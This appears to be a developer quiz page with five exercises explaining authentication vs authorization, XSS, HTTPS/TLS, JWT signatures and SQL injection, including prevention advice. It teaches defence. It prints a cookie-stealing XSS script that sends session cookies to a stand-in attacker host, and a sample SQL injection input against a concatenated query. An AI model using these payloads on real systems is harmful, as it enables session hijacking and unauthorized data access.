5 exercises — core security terms: authentication vs authorization, XSS, HTTPS/TLS, JWT, and SQL injection. Covers the most common topics in security discussions and developer interviews.
Attacks (OWASP Top 10): SQL injection · XSS · CSRF · SSRF · broken access control · insecure deserialization
Transport: TLS · HTTPS · certificate · CA · cipher suite · HSTS · mTLS
Access control: RBAC · ABAC · principle of least privilege · zero trust · secret management
0 / 5 completed
1 / 5
What is the difference between authentication and authorization?
Authentication (AuthN) answers: "Who are you?" — verifying identity via password, token, biometric, or certificate. Authorization (AuthZ) answers: "What are you allowed to do?" — checking permissions after identity is confirmed. Classic mnemonic: AutheNtication = ideNtity. Real example: you log in (authentication), but you can only read data, not delete it (authorization). Common protocols: OAuth 2.0 (authorization framework), OIDC — OpenID Connect (authentication layer on top of OAuth), SAML (enterprise SSO), JWT (token format used in both). This distinction is one of the most common interview questions in security and backend roles.
2 / 5
A Cross-Site Scripting (XSS) attack works by:
XSS (Cross-Site Scripting) injects malicious JavaScript into a web page that other users then execute. Example: a comment field that stores <script>document.location='http://attacker.com/steal?c='+document.cookie</script> — when another user views the page, their browser runs the script and their session cookie is stolen. Prevention: output encoding (HTML-encode all user-supplied content before rendering), Content Security Policy (CSP) header (restricts which scripts can run), framework-level escaping (React, Angular auto-escape by default). The other options describe: A = CSRF, B = SQL injection, D = Man-in-the-middle attack.
3 / 5
What is HTTPS and what does it protect against?
HTTPS = HTTP over TLS (Transport Layer Security). It provides: ① Encryption — data in transit cannot be read by a third party (confidentiality); ② Integrity — data cannot be modified in transit without detection; ③ Authentication — the TLS certificate confirms you're talking to the real server, not an impersonator. TLS uses asymmetric cryptography for key exchange, then symmetric encryption (AES) for the session. Key terms: certificate, CA (Certificate Authority), certificate chain, SNI (Server Name Indication), TLS handshake, cipher suite. HTTP Strict Transport Security (HSTS) forces browsers to always use HTTPS for a domain.
4 / 5
Complete with the correct security term: "The API validates the JWT on every request. If the token is expired or the _____ doesn't match, the request is rejected with a 401."
A JWT (JSON Web Token) has three Base64-encoded parts separated by dots: header.payload.signature. The signature is created by signing the header + payload with a secret key (HMAC) or private key (RSA/ECDSA). If someone tampers with the payload (e.g. changes "role":"user" to "role":"admin"), the signature no longer matches and the token is rejected. This is what makes JWTs tamper-evident. Important: JWTs are signed, not encrypted by default — anyone can read the payload. Never store sensitive data in a JWT unless you also encrypt it (JWE). For sensitive revocation needs consider opaque tokens + token introspection instead.
5 / 5
What is SQL injection and how is it prevented?
SQL injection occurs when user input is directly concatenated into SQL queries. Example: query = "SELECT * FROM users WHERE name = '" + username + "'" — if username is ' OR 1=1 --, the query returns all users. Prevention: ① Parameterized queries / prepared statements — the SQL template and the user data are sent separately; the DB never interprets user data as SQL. ② ORMs — usually handle this automatically. ③ Input validation — defence in depth, not a primary fix. SQL injection is consistently ranked #1 in the OWASP Top 10 (Injection category). The same principle applies to NoSQL injection, LDAP injection, and command injection.